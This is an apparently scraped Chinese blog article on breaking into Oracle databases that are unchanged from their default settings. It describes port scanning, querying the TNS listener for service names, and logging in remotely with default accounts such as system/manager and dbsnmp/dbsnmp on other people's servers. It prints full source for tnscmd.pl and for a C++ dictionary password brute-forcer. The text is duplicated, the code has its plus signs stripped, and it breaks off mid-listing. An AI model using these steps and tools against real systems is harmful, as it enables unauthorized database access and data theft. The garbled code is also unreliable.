黑客入侵oracle数据库的一些心得
程序员文章站
2022-03-29 16:01:16
一、先看下面的一个贴子:
Oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点:
1、支持大数据库、多用户的... 08-10-08...
一、先看下面的一个贴子:
oracle数据库是现在很流行的数据库系统,很多大型网站都采用oracle,它之所以倍受用户喜爱是因为它有以下突出的特点:
1、支持大数据库、多用户的高性能的事务处理。oracle支持最大数据库,其大小可到几百千兆,可充分利用硬件设备。支持大量用户同时在同一数据上执行各种数据应用,并使数据争用最小,保证数据一致性。系统维护具有高的性能,oracle每天可连续24小时工作,正常的系统操作(后备或个别计算机系统故障)不会中断数据库的使用。可控制数据库数据的可用性,可在数据库级或在子数据库级上控制。
2、oracle遵守数据存取语言、操作系统、用户接口和网络通信协议的工业标准。所以它是一个开放系统,保护了用户的投资。美国标准化和技术研究所(nist)对oracle7 server进行检验,100%地与ansi/iso sql89标准的二级相兼容。
3、实施安全性控制和完整性控制。oracle为限制各监控数据存取提供系统可靠的安全性。oracle实施数据完整性,为可接受的数据指定标准。
4、支持分布式数据库和分布处理。oracle为了充分利用计算机系统和网络,允许将处理分为数据库服务器和客户应用程序,所有共享的数据管理由数据库管理系统的计算机处理,而运行数据库应用的工作站集中于解释和显示数据。通过网络连接的计算机环境,oracle将存放在多台计算机上的数据组合成一个逻辑数据库,可被全部网络用户存取。分布式系统像集中式数据库一样具有透明性和数据一致性。
具有可移植性、可兼容性和可连接性。由于oracle软件可在许多不同的操作系统上运行,以致oracle上所开发的应用可移植到任何操作系统,只需很少修改或不需修改。oracle软件同工业标准相兼容,包括很多工业标准的操作系统,所开发应用系统可在任何操作系统上运行。可连接性是指oralce允许不同类型的计算机和操作系统通过网络可共享信息。
虽然oracle数据库具有很高的安全性,但是如果我们在配置的时候不注意安全意识,那么也是很危险的。也就是说,安全最主要的还是要靠人自己,而不能过分依赖软件来实现。
我们知道,在mssql中,安装完成后默认有个sa的登陆密码为空,如果不更改就会产生安全漏洞。那么oracle呢?也有的。为了安装和调试的方便,oracle数据库中的两个具有dba权限的用户sys和system的缺省密码是manager。笔者发现很多国内网站的oracle数据库没有更改这两个用户的密码,其中也包括很多大型的电子商务网站, 我们就可以利用这个缺省密码去找我们感兴趣的东西。如何实现,看下面的文章吧。
进行测试前我们先来了解一些相关的知识,我们连接一个oracle数据库的时候,需要知道它的service_name或者是sid值,就象mssql一样,需要知道数据库名。那如何去知道呢,猜?呵呵,显然是不行的。这里我们先讲讲oracle的tns listener,它位于数据库client和数据库server之间,默认监听1521端口,这个监听端口是可以更改的。但是如果你用一个tcp的session去连接1521端口的话,oracle将不会返回它的banner,如果你输入一些东西的话,它甚至有可能把你踢出去。这里我们就需要用tnscmd.pl这个perl程序了,它可以查询远程oracle数据库是否开启(也就是ping了),查询版本,以及查询它的服务名,服务状态和数据库服务名,而且正确率很高。
理论方面的讲完了,如果还有什么不懂的可以去查找相关资料。现在开始测试吧,需要的工具有:activeperl,oracle客户端,superscan或者是其它扫描端口的软件, tnscmd.pl。
我们先用superscan扫描开放了端口1521的主机,假设其ip是xx.xx.110.110,这样目标已经有了。然后我们要做的就是用tnscmd.pl来查询远程数据库的服务名了,tnscmd.pl的用法如下:
c:perlbin>perl tnscmd.pl
usage: tnscmd.pl [command] -h hostname
where 'command' is something like ping, version, status, etc.
(default is ping)
[-p port] - alternate tcp port to use (default is 1521)
[--logfile logfile] - write raw packets to specified logfile
[--indent] - indent & outdent on parens
[--rawcmd command] - build your own connect_data string
[--cmdsize bytes] - fake tns command size (reveals packet leakage)
我们下面用的只有简单的几个命令,其他的命令也很好用,一起去发掘吧。 然后我们就这样来: c:perlbin>perl tnscmd.pl services -h xx.xx.110.110 -p 1521 –indent sending (connect_data=(command=services)) to xx.xx.110.110:1521 writing 91 bytes reading ._.......6.........?. .......... description= tmp= vsnnum=135286784 err=0 services_exist=1 .q........ service= service_name=orcl instance= instance_name=orcl num=1 instance_class=oracle handler= handler_display=dedicated server sta=ready handler_info=local server handler_maxload=0 handler_load=0 established=447278 refused=0 handler_id=8ca61d1bbda6-3f5c-e030-813df5430227 handler_name=dedicated address= protocol=beq program=/home/oracle/bin/oracle envs='oracle_home=/home/oracle,oracle_sid=orcl' argv0=oracleorcl args=' local=no ' .........@
从上面得到的信息我们可以看出数据库的服务名为orcl,然后我们就可以通过sqlplus工具来远程连上它了,用户名和密码我们用默认的system/manager或者是sys/manager,其他的如mdsys/mdsys,ctxsys/ctxsys等,这个默认用户和密码是随版本的不同而改变的。如下: c:oracleora90bin>sqlplus /nolog sql*plus: release 9.0.1.0.1 - production on thu may 23 11:36:59 2002 (c) copyright 2001 oracle corporation. all rights reserved. sql>connect system/manager@ (description=(address_list=(address=(protocol=tcp) (host=xx.xx.110.110)(port=1521))) (connect_data=(service_name=orcl))); 如果密码正确,那么就会提示connected,如果不行,再换别的默认用户名和密码。经过笔者的尝试一般用dbsnmp/dbsnmp都能进去。当然如果对方已经把默认密码改了,那我们只能换别的目标了。但是我发现很多都是不改的,这个就是安全意识的问题了。
二、上面提到的两个小软件:
tnscmd.pl copy code
#!/usr/bin/perl
#
# tnscmd - a lame tool to prod the oracle tnslsnr process (1521/tcp)
# tested under linux x86 & openbsd sparc perl5
#
# initial cruft: jwa@jammed.com 5 oct 2000
#
# $id: tnscmd,v 1.3 2001/04/26 06:45:48 jwa exp $
#
# see als
# http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd-doc.html
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2000-0818
# http://otn.oracle.com/deploy/security/alerts.htm
# http://xforce.iss.net/alerts/advise66.php
#
# gpl'd, of course. http://www.gnu.org/copyleft/gpl.html
#
# $log: tnscmd,v $
# revision 1.3 2001/04/26 06:45:48 jwa
# typo in url. whoops.
#
# revision 1.2 2001/04/26 06:42:17 jwa
# complete rewrite
# - use i:socket instead of tcp_open
# - got rid of pdump()
# - put packet into @list and build it with pack()
# - added --indent option
#
# use i:socket;
use strict; # a grumpy perl interpreter is your friend select(stdout);$|=1; #
# process arguments
# my ($cmd) = $argv[0] if ($argv[0] !~ /^-/);
my ($arg); while ($arg = shift @argv) {
$main::hostname = shift @argv if ($arg eq "-h");
$main::port = shift @argv if ($arg eq "-p");
$main::logfile = shift @argv if ($arg eq "--logfile");
$main::fakepacketsize = shift @argv if ($arg eq "--packetsize");
$main::fakecmdsize = shift @argv if ($arg eq "--cmdsize");
$main::indent = 1 if ($arg eq "--indent");
$main::rawcmd = shift @argv if ($arg eq "--rawcmd");
$main::rawout = shift @argv if ($arg eq "--rawout");
} if ($main::hostname eq "") {
print <<_eof_;
usage: $0 [command] -h hostname
where 'command' is something like ping, version, status, etc.
(default is ping)
[-p port] - alternate tcp port to use (default is 1521)
[--logfile logfile] - write raw packets to specified logfile
[--indent] - indent & outdent on parens
[--rawcmd command] - build your own connect_data string
[--cmdsize bytes] - fake tns command size (reveals packet leakage)
_eof_
exit(0);
} # with no commands, default to pinging port 1521 $cmd = "ping" if ($cmd eq "");
$main::port = 1521 if ($main::port eq ""); # 1541, 1521.. dbas are so whimsical
#
# main
# my ($command); if (defined($main::rawcmd))
{
$command = $main::rawcmd;
}
else
{
$command = "(connect_data=(command=$cmd))";
}
my $response = tnscmd($command);
viewtns($response);
exit(0);
#
# build the packet, open the socket, send the packet, return the response
# sub tnscmd
{
my ($command) = shift @_;
my ($packetlen, $cmdlen);
my ($clenh, $clenl, $plenh, $plenl);
my ($i); print "sending $command to $main::hostname:$main::port\n"; if ($main::fakecmdsize ne "")
{
$cmdlen = $main::fakecmdsize;
print "faking command length to $cmdlen bytes\n";
}
else
{
$cmdlen = length ($command);
} $clenh = $cmdlen >> 8;
$clenl = $cmdlen & 0xff; # calculate packet length if (defined($main::fakepacketsize))
{
print "faking packet length to $main::fakepacketsize bytes\n";
$packetlen = $main::fakepacketsize;
}
else
{
$packetlen = length($command) 58; # "preamble" is 58 bytes
} $plenh = $packetlen >> 8;
$plenl = $packetlen & 0xff; $packetlen = length($command) 58 if (defined($main::fakepacketsize)); # decimal offset
# 0: packetlen_high packetlen_low
# 26: cmdlen_high cmdlen_low
# 58: command # the packet. my (@packet) = (
$plenh, $plenl, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x01, 0x36, 0x01, 0x2c, 0x00, 0x00, 0x08, 0x00,
0x7f, 0xff, 0x7f, 0x08, 0x00, 0x00, 0x00, 0x01,
$clenh, $clenl, 0x00, 0x3a, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x34, 0xe6, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00
);
for ($i=0;$i<length($command);$i )
{
push(@packet, ord(substr($command, $i, 1)));
} my ($sendbuf) = pack("c*", @packet); print "connect ";
my ($tns_sock) = i:socket::inet->new(
peeraddr => $main::hostname,
peerport => $main::port,
proto => 'tcp',
type => sock_stream,
timeout => 30) || die "connect to $main::hostname failure: $!";
$tns_sock->autoflush(1); print "\rwriting " . length($sendbuf) . " bytes\n"; if (defined($main::logfile))
{
open(send, ">$main::logfile.send") || die "can't write $main::logfile.send: $!";
print send $sendbuf || die "write to logfile failed: $!";
close(send);
} my ($count) = syswrite($tns_sock, $sendbuf, length($sendbuf)); if ($count != length($sendbuf))
{
print "only wrote $count bytes?!";
exit 1;
} print "reading\n"; # get fun data
# 1st 12 bytes have some meaning which so far eludes me if (defined($main::logfile))
{
open(rec, ">$main::logfile.rec") || die "can't write $main::logfile.rec: $!";
} my ($buf, $recvbuf); # read until socket eof
while (sysread($tns_sock, $buf, 128))
{
print rec $buf if (defined($main::logfile));
$recvbuf .= $buf;
}
close (rec) if (defined($main::logfile));
close ($tns_sock);
return $recvbuf;
}
sub viewtns
{
my ($response) = shift @_; # should have a hexdump option . . . if ($main::raw)
{
print $response;
}
else
{
$response =~ tr/\200-\377/\000-\177/; # strip high bits
$response =~ tr/\000-\027/\./;
$response =~ tr/\177/\./; if ($main::indent)
{
parenify($response);
}
else
{
print $response;
}
print "\n";
}
}
sub parenify
{
my ($buf) = shift @_;
my ($i, $c);
my ($indent, $o_indent); for ($i=0;$i<length($buf);$i )
{
$c = substr($buf, $i, 1);
$indent if ($c eq "(");
$indent-- if ($c eq ")");
if ($indent != $o_indent)
{
print "\n" unless(substr($buf, $i 1, 1) eq "(");
print " " x $indent;
$o_indent = $indent;
undef $c;
}
print $c;
}
}
copy code
/*用链表实现的oracle密码暴破程序,需要在本地安装oralce*/
#define win32_lean_and_mean
#if defined(_win32) || defined(_win64)
#include <windows.h>
#include <tchar.h>
#endif
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <lmcons.h>
#include <winnetwk.h>
#include <time.h>
#include <stdlib.h>
#include <stdlib.h>
#include <iostream>
#include <occi.h>
#pragma comment(lib, "oraocci9.lib") //链接到oraocci9.lib库
//#pragma comment(lib, "msvcrt.lib")
#pragma comment(lib, "msvcprt.lib")
//链接到ws2_32.lib库:
#pragma comment(lib, "ws2_32.lib")
//#pragma comment(lib, "liboracle.lib") char target[40]= {0};//目标服务器
char port[40]={0};//sql端口号
char db[40]={0};//数据库名 //定义链表:
typedef struct passnode{
tchar password[100];
struct passnode * next;
} passinfo; typedef struct namenode{
tchar name[100];
struct namenode * next;
}nameinfo; //定义nameinfo来表示namenode结构 //
//函数sqlcheck
//功能:尝试用不同密码连接sql server,探测出正确的密码
//
dword winapi sqlcheck(pvoid ppwd,pvoid uusername)
{
//定义局部变量
char szbuffer[1025]= {0};
char *pwd=null,*username=null;
char database[255]={0};
//char *user=null;
//取得传递过来准备探测的密码
pwd=(char *)ppwd;
username=(char *)uusername;
//database=(char *)db;
sprintf(database,"(description=(address_list=(address=(protocol=tcp)(host=%s)(port=%s)))(connect_data=(service_name=%s)))",target,port,db);
//printf("database=%s\n",database);
using namespace std;
using namespace oracle::occi; environment * env=environment::createenvironment(environment::default); try{
connection *conn=env->createconnection(username,pwd,(char *)database);
if (conn)
{ printf("\n");
cout << "success - createconnection" << endl;
//连接远程oracle server数据库成功
return 1;
}
else
cout << "failure - createconnection" << endl;
return 0; /*statement*stmt=conn->createstatement("select * from emp");
resultset * rset=stmt->executequery();
while (rset->next()) {
cout<<"the empno is:"<<rset->getint(1)<<endl;
cout<<"the ename is:"<<rset->getstring(2)<<endl; } */
//stmt->closeresultset (rset);
// conn->terminatestatement (stmt);
env->terminateconnection (conn); }catch(sqlexception ex) {
//printf("\n");
cout<<ex.getmessage();
return 0; }
environment::terminateenvironment(env);
return 0;
}
void usage(){ printf("name:oracle password crack v 1.0\n");
printf("author:pt007@vip.sina.com\n\n");
fprintf(stdout,"usage : oracle_pwd_crack [ip] [options]\n");
printf("options:\n"
"\t-x port specify the port of oracle\n"
"\t-u username specify the username of oracle\n"
// "\t-p password specify the password of oracle\n"
"\t-d dict specify the dictionary\n"
"\t-i database specify the database's name\n"
//"\t-a automode automatic crack the oracle password \n"
//"\tnote: when u use the -a option, named the username dict user.dic\n"
// "\t password dict pass.dic\n"
);
printf("\nexample: oracle_pwd_crack 127.0.0.1 -x 1521 -u sql_user.dic -d pass.dic -i plsextproc\n");
exit(1); } //创建密码链表:
passinfo * create_pass_link(int nodenum, file * dictfile){ /* read data from password dictionary, init the link */
tchar * sztemppass = null;
passinfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/ //分配内存空间在内存的动态存储区中分配一块长度为"sizeof(passinfo)"字节的连续区域,函数的返回值为该区域的首地址:
if ( (h = (passinfo *) malloc(sizeof(passinfo))) == null )
{
fprintf(stderr, "malloc failed %d", getlasterror());
exit(0);
} /* create the head node */ /* init the head node*/
h->next = null;
p = h; for ( i=0; i < nodenum; i ) //下面是建立链表,每个密码对应一个结点:
{ //按sizeof(tchar)的长度分配100块连续的区域,并把指向tchar类型指针的首地址赋予指针变量sztemppass
sztemppass = (tchar *)calloc(100, sizeof(tchar));
zeromemory(sztemppass, 100); if ( (s = (passinfo *)malloc(sizeof(passinfo))) == null)
{
fprintf(stderr, "malloc failed %d", getlasterror());
exit(0);
}
memset(s->password, '\0', 100);
fgets(sztemppass, 100, dictfile);
strncpy(s->password, sztemppass, strlen(sztemppass)-1);
s->next =null; //删除一个结点
p->next = s;//链表指针指向下一个结构地址
p = s;//下一个结构的数据域赋值 free(sztemppass);//释放内存空间 }
return h;//返回链表的头结点,它存放有第一个结点的首地址,没有数据 }
//创建用户名链表:
nameinfo * create_name_link(int nodenum, file * dictfile){ /* read data from password dictionary, init the link */
tchar * sztempname = null;
nameinfo *h, *p, *s; /* *h point to head node, *p point to the pre node,
*s point to the current node*/
int i; /* counter*/ //分配内存空间在内存的动态存储区中分配一块长度为"sizeof(nameinfo)"字节的连续区域,函数的返回值为该区域(此处为nameinfo结构的首地址)的首地址: :
if ( (h = (nameinfo *) malloc(sizeof(nameinfo))) == null )
{
fprintf(stdout, "malloc failed %d", getlasterror());
exit(0);
} /* create the head node */ /* init the head node*/
h->next = null; //删除下一个结点
p = h; //p里面目前指向头结点 for ( i=0; i < nodenum; i )
{//按sizeof(tchar)的长度分配100块连续的区域,并把指向tchar类型指针的首地址赋予指针变量sztemppass:
sztempname = (tchar *)calloc(100, sizeof(tchar));
zeromemory(sztempname, 100);//字符串类型变量清0 if ( (s = (nameinfo *)malloc(sizeof(nameinfo))) == null)
{
fprintf(stdout, "malloc failed %d", getlasterror());
exit(0);
}
memset(s->name, '\0', 100);
fgets(sztempname, 100, dictfile);
strncpy(s->name, sztempname, strlen(sztempname)-1);
s->next =null;
p->next = s;//p指向下一个结点的地址
p = s;//下一个结构的数据域赋值 free(sztempname); }
return h; }
int linecount(file * fd) //返回字典中的密码数量
{
int countline = 0;
char data[100] = {0};//字符数组清0 while (fgets(data, 100, fd))//从指定的文件中读一个字符串到字符数组中
countline ; rewind(fd);//指针返回到文件起始处 return countline;
} bool isportopen(char * address, int port)
{
int recv = 1;
wsadata wsadata;
int fd;
struct sockaddr_in clientaddress;
struct hostent * host1;
bool result = false;
struct timeval timer4;
fd_set writefd; //检查数据是否可写
ulong value = 1;
//初使化winsock版本1.1:
recv = wsastartup(makeword(1,1), &wsadata); if(recv != 0)
{
printf("init failed %d.\n",wsagetlasterror());
return(0);
} if ( lobyte( wsadata.wversion ) != 1 ||
hibyte( wsadata.wversion ) != 1 ) {
/* tell the user that we couldn't find a useable */
/* winsock.dll. */
wsacleanup();
return(0);
}
//创建socket套接字连接:
fd = socket(af_inet,sock_stream,ipproto_tcp);
if(fd < 0)
{
printf("[-] create socket error %d. \n",wsagetlasterror());
return(0);
}
//将套接字fd设为非阻塞模式的方法:
ioctlsocket(fd,fionbio,&value); if (!(host1 = gethostbyname(address))){
printf("[-] gethostbyname(%s) error %d.\n",address,wsagetlasterror());
return(0);
} memset(&clientaddress, 0, sizeof(struct sockaddr));
clientaddress.sin_family =af_inet;//ipv4地址族
clientaddress.sin_port = htons((unsigned short)port);
clientaddress.sin_addr = *((struct in_addr *)host1->h_addr); timer4.tv_sec = 5;//以秒为单位指定等待时间
timer4.tv_usec = 0; fd_zero(&writefd);
fd_set(fd,&writefd); //将套接字fd增添到writefd写集合中进行测试 recv = connect(fd, (struct sockaddr *)&clientaddress, sizeof(struct sockaddr)); if( fd_isset(fd, &writefd))
{
recv = select(fd 1, null, &writefd, null, &timer4);//测试5秒钟内是否有数据写入 if( recv > 0 )
result = true;
} closesocket(fd);
wsacleanup(); return result; }
int main(int argc, char **argv)
{ passinfo * head, * curr = null;
nameinfo * headnode, * currnode = null;
int namecount = 0, passcount = 0; /////////////////////////////////////////////////////////////////////////////////////////////
// deal with the command line
//
/////////////////////////////////////////////////////////////////////////////////////////////
//参数不为8个的时候打印帮助
if(argc != 10)
usage(); if (argc == 10)
{
if ( strcmpi(argv[2], "-x") )
usage(); if ( strcmpi(argv[4], "-u") )
usage(); if ( strcmpi(argv[6], "-d") )
usage();
if ( strcmpi(argv[8], "-i") )
usage();
} /* determinate whether the oracle port is open */
if( !isportopen(argv[1], atoi(argv[3]) ) )
{
printf("error:can't connect to %s:%d\n", argv[1], atoi(argv[3]));
exit(0);
}
////////////////////////////////////////////////////////////////////////////////////////////
// specifiy the username
////////////////////////////////////////////////////////////////////////////////////////////// //取得目标地址和端口号:
strcpy(target,argv[1]);
strcpy(port,argv[3]);
strcpy(db,argv[9]); if ( !strcmpi(argv[4], "-u"))
{
/* open the password dictionary */ file * passdic = null;
if ( (passdic = fopen(argv[7], "r")) ==null){
fprintf(stdout, "can't open the password dictionary\n");
exit(0);
}
/* count line of name dictionary */ passcount = linecount(passdic); //计算密码的数量
head = create_pass_link(passcount, passdic); /* create the password link */
curr = head ->next; //指向第一个结点 /* open the password dictionary */ file * namedict = null;
if ( (namedict = fopen(argv[5], "r")) ==null){
fprintf(stderr, "can't open the name dictionary\n");
exit(0);
} /*密码最终保存文件*/
file *passtxt=null;
if ( (passtxt = fopen("pass.txt", "at ")) ==null){
fprintf(stdout, "can't write pass.txt file!\n");
exit(0);
} /* count line of name dictionary */ namecount = linecount(namedict);//计算用户名数量
headnode = create_name_link(namecount, namedict); /* create user link */
currnode = headnode->next; int j=0,i=1;
while(currnode!=null) //为null表示姓名链表结束
{
printf("\n开始第%d位用户%s测试:\n", j,currnode->name);
while(curr != null) //为null表示密码链表结束
{
printf("now cracking %s->%s \n", currnode->name, curr->password);
fflush(null);
int cracked=0;
cracked=sqlcheck(curr->password,currnode->name);
if ( cracked==1 )
{
printf("%d.successfully:oracle server %s's username [%s] password [%s]\n",j,target,currnode->name, curr->password);
fseek(passtxt, 0l, seek_end);//移动到文件尾部
fprintf(passtxt,"%d.successfully:oracle server %s's username [%s] password [%s]\r\n",i ,target,currnode->name, curr->password);
//exit(0);发现一个密码就退出
break;
}
curr = curr->next;//移动到下一个结点
sleep(100);//暂停100ms,即0.1s } /* starting crack the oracle password*/
currnode = currnode->next;
curr = head ->next; //移到密码链表的第一个结点
}
printf("\n\n密码猜解结束:\n本次共猜解了%d位用户,%d个密码!\n",namecount,passcount);
printf("请使用\"type pass.txt\"来查看当前目录下的pass.txt文件!\n");
fprintf(passtxt,"\r\n\r\n");
fclose(passdic);
fclose(namedict);
fclose(passtxt);
free(head);
} return 0; }
我们下面用的只有简单的几个命令,其他的命令也很好用,一起去发掘吧。 然后我们就这样来: c:perlbin>perl tnscmd.pl services -h xx.xx.110.110 -p 1521 –indent sending (connect_data=(command=services)) to xx.xx.110.110:1521 writing 91 bytes reading ._.......6.........?. .......... description= tmp= vsnnum=135286784 err=0 services_exist=1 .q........ service= service_name=orcl instance= instance_name=orcl num=1 instance_class=oracle handler= handler_display=dedicated server sta=ready handler_info=local server handler_maxload=0 handler_load=0 established=447278 refused=0 handler_id=8ca61d1bbda6-3f5c-e030-813df5430227 handler_name=dedicated address= protocol=beq program=/home/oracle/bin/oracle envs='oracle_home=/home/oracle,oracle_sid=orcl' argv0=oracleorcl args=' local=no ' .........@
从上面得到的信息我们可以看出数据库的服务名为orcl,然后我们就可以通过sqlplus工具来远程连上它了,用户名和密码我们用默认的system/manager或者是sys/manager,其他的如mdsys/mdsys,ctxsys/ctxsys等,这个默认用户和密码是随版本的不同而改变的。如下: c:oracleora90bin>sqlplus /nolog sql*plus: release 9.0.1.0.1 - production on thu may 23 11:36:59 2002 (c) copyright 2001 oracle corporation. all rights reserved. sql>connect system/manager@ (description=(address_list=(address=(protocol=tcp) (host=xx.xx.110.110)(port=1521))) (connect_data=(service_name=orcl))); 如果密码正确,那么就会提示connected,如果不行,再换别的默认用户名和密码。经过笔者的尝试一般用dbsnmp/dbsnmp都能进去。当然如果对方已经把默认密码改了,那我们只能换别的目标了。但是我发现很多都是不改的,这个就是安全意识的问题了。
二、上面提到的两个小软件:
tnscmd.pl copy code
#!/usr/bin/perl
#
# tnscmd - a lame tool to prod the oracle tnslsnr process (1521/tcp)
# tested under linux x86 & openbsd sparc perl5
#
# initial cruft: jwa@jammed.com 5 oct 2000
#
# $id: tnscmd,v 1.3 2001/04/26 06:45:48 jwa exp $
#
# see als
# http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd-doc.html
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2000-0818
# http://otn.oracle.com/deploy/security/alerts.htm
# http://xforce.iss.net/alerts/advise66.php
#
# gpl'd, of course. http://www.gnu.org/copyleft/gpl.html
#
# $log: tnscmd,v $
# revision 1.3 2001/04/26 06:45:48 jwa
# typo in url. whoops.
#
# revision 1.2 2001/04/26 06:42:17 jwa
# complete rewrite
# - use i:socket instead of tcp_open
# - got rid of pdump()
# - put packet into @list and build it with pack()
# - added --indent option
#
# use i:socket;
use strict; # a grumpy perl interpreter is your friend select(stdout);$|=1; #
# process arguments
# my ($cmd) = $argv[0] if ($argv[0] !~ /^-/);
my ($arg); while ($arg = shift @argv) {
$main::hostname = shift @argv if ($arg eq "-h");
$main::port = shift @argv if ($arg eq "-p");
$main::logfile = shift @argv if ($arg eq "--logfile");
$main::fakepacketsize = shift @argv if ($arg eq "--packetsize");
$main::fakecmdsize = shift @argv if ($arg eq "--cmdsize");
$main::indent = 1 if ($arg eq "--indent");
$main::rawcmd = shift @argv if ($arg eq "--rawcmd");
$main::rawout = shift @argv if ($arg eq "--rawout");
} if ($main::hostname eq "") {
print <<_eof_;
usage: $0 [command] -h hostname
where 'command' is something like ping, version, status, etc.
(default is ping)
[-p port] - alternate tcp port to use (default is 1521)
[--logfile logfile] - write raw packets to specified logfile
[--indent] - indent & outdent on parens
[--rawcmd command] - build your own connect_data string
[--cmdsize bytes] - fake tns command size (reveals packet leakage)
_eof_
exit(0);
} # with no commands, default to pinging port 1521 $cmd = "ping" if ($cmd eq "");
$main::port = 1521 if ($main::port eq ""); # 1541, 1521.. dbas are so whimsical
#
# main
# my ($command); if (defined($main::rawcmd))
{
$command = $main::rawcmd;
}
else
{
$command = "(connect_data=(command=$cmd))";
}
my $response = tnscmd($command);
viewtns($response);
exit(0);
#
# build the packet, open the socket, send the packet, return the response
# sub tnscmd
{
my ($command) = shift @_;
my ($packetlen, $cmdlen);
my ($clenh, $clenl, $plenh, $plenl);
my ($i); print "sending $command to $main::hostname:$main::port\n"; if ($main::fakecmdsize ne "")
{
$cmdlen = $main::fakecmdsize;
print "faking command length to $cmdlen bytes\n";
}
else
{
$cmdlen = length ($command);
} $clenh = $cmdlen >> 8;
$clenl = $cmdlen & 0xff; # calculate packet length if (defined($main::fakepacketsize))
{
print "faking packet length to $main::fakepacketsize bytes\n";
$packetlen = $main::fakepacketsize;
}
else
{
$packetlen = length($command) 58; # "preamble" is 58 bytes
} $plenh = $packetlen >> 8;
$plenl = $packetlen & 0xff; $packetlen = length($command) 58 if (defined($main::fakepacketsize)); # decimal offset
# 0: packetlen_high packetlen_low
# 26: cmdlen_high cmdlen_low
# 58: command # the packet. my (@packet) = (
$plenh, $plenl, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x01, 0x36, 0x01, 0x2c, 0x00, 0x00, 0x08, 0x00,
0x7f, 0xff, 0x7f, 0x08, 0x00, 0x00, 0x00, 0x01,
$clenh, $clenl, 0x00, 0x3a, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x34, 0xe6, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00
);
for ($i=0;$i<length($command);$i )
{
push(@packet, ord(substr($command, $i, 1)));
} my ($sendbuf) = pack("c*", @packet); print "connect ";
my ($tns_sock) = i:socket::inet->new(
peeraddr => $main::hostname,
peerport => $main::port,
proto => 'tcp',
type => sock_stream,
timeout => 30) || die "connect to $main::hostname failure: $!";
$tns_sock->autoflush(1); print "\rwriting " . length($sendbuf) . " bytes\n"; if (defined($main::logfile))
{
open(send, ">$main::logfile.send") || die "can't write $main::logfile.send: $!";
print send $sendbuf || die "write to logfile failed: $!";
close(send);
} my ($count) = syswrite($tns_sock, $sendbuf, length($sendbuf)); if ($count != length($sendbuf))
{
print "only wrote $count bytes?!";
exit 1;
} print "reading\n"; # get fun data
# 1st 12 bytes have some meaning which so far eludes me if (defined($main::logfile))
{
open(rec, ">$main::logfile.rec") || die "can't write $main::logfile.rec: $!";
} my ($buf, $recvbuf); # read until socket eof
while (sysread($tns_sock, $buf, 128))
{
print rec $buf if (defined($main::logfile));
$recvbuf .= $buf;
}
close (rec) if (defined($main::logfile));
close ($tns_sock);
return $recvbuf;
}
sub viewtns
{
my ($response) = shift @_; # should have a hexdump option . . . if ($main::raw)
{
print $response;
}
else
{
$response =~ tr/\200-\377/\000-\177/; # strip high bits
$response =~ tr/\000-\027/\./;
$response =~ tr/\177/\./; if ($main::indent)
{
parenify($response);
}
else
{
print $response;
}
print "\n";
}
}
sub parenify
{
my ($buf) = shift @_;
my ($i, $c);
my ($indent, $o_indent); for ($i=0;$i<length($buf);$i )
{
$c = substr($buf, $i, 1);
$indent if ($c eq "(");
$indent-- if ($c eq ")");
if ($indent != $o_indent)
{
print "\n" unless(substr($buf, $i 1, 1) eq "(");
print " " x $indent;
$o_indent = $indent;
undef $c;
}
print $c;
}
}
copy code
/*用链表实现的oracle密码暴破程序,需要在本地安装oralce*/
#define win32_lean_and_mean
#if defined(_win32) || defined(_win64)
#include <windows.h>
#include <tchar.h>
#endif
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <lmcons.h>
#include <winnetwk.h>
#include <time.h>
#include <stdlib.h>
#include <stdlib.h>
#include <iostream>
#include <occi.h>
#pragma comment(lib, "oraocci9.lib") //链接到oraocci9.lib库
//#pragma comment(lib, "msvcrt.lib")
#pragma comment(lib, "msvcprt.lib")
//链接到ws2_32.lib库:
#pragma comment(lib, "ws2_32.lib")
//#pragma comment(lib, "liboracle.lib") char target[40]= {0};//目标服务器
char port[40]={0};//sql端口号
char db[40]={0};//数据库名 //定义链表:
typedef struct passnode{
tchar password[100];
struct passnode * next;
} passinfo; typedef struct namenode{
tchar name[100];
struct namenode * next;
}nameinfo; //定义nameinfo来表示namenode结构 //
//函数sqlcheck
//功能:尝试用不同密码连接sql server,探测出正确的密码
//
dword winapi sqlcheck(pvoid ppwd,pvoid uusername)
{
//定义局部变量
char szbuffer[1025]= {0};
char *pwd=null,*username=null;
char database[255]={0};
//char *user=null;
//取得传递过来准备探测的密码
pwd=(char *)ppwd;
username=(char *)uusername;
//database=(char *)db;
sprintf(database,"(description=(address_list=(address=(protocol=tcp)(host=%s)(port=%s)))(connect_data=(service_name=%s)))",target,port,db);
//printf("database=%s\n",database);
using namespace std;
using namespace oracle::occi; environment * env=environment::createenvironment(environment::default); try{
connection *conn=env->createconnection(username,pwd,(char *)database);
if (conn)
{ printf("\n");
cout << "success - createconnection" << endl;
//连接远程oracle server数据库成功
return 1;
}
else
cout << "failure - createconnection" << endl;
return 0; /*statement*stmt=conn->createstatement("select * from emp");
resultset * rset=stmt->executequery();
while (rset->next()) {
cout<<"the empno is:"<<rset->getint(1)<<endl;
cout<<"the ename is:"<<rset->getstring(2)<<endl; } */
//stmt->closeresultset (rset);
// conn->terminatestatement (stmt);
env->terminateconnection (conn); }catch(sqlexception ex) {
//printf("\n");
cout<<ex.getmessage();
return 0; }
environment::terminateenvironment(env);
return 0;
}
void usage(){ printf("name:oracle password crack v 1.0\n");
printf("author:pt007@vip.sina.com\n\n");
fprintf(stdout,"usage : oracle_pwd_crack [ip] [options]\n");
printf("options:\n"
"\t-x port specify the port of oracle\n"
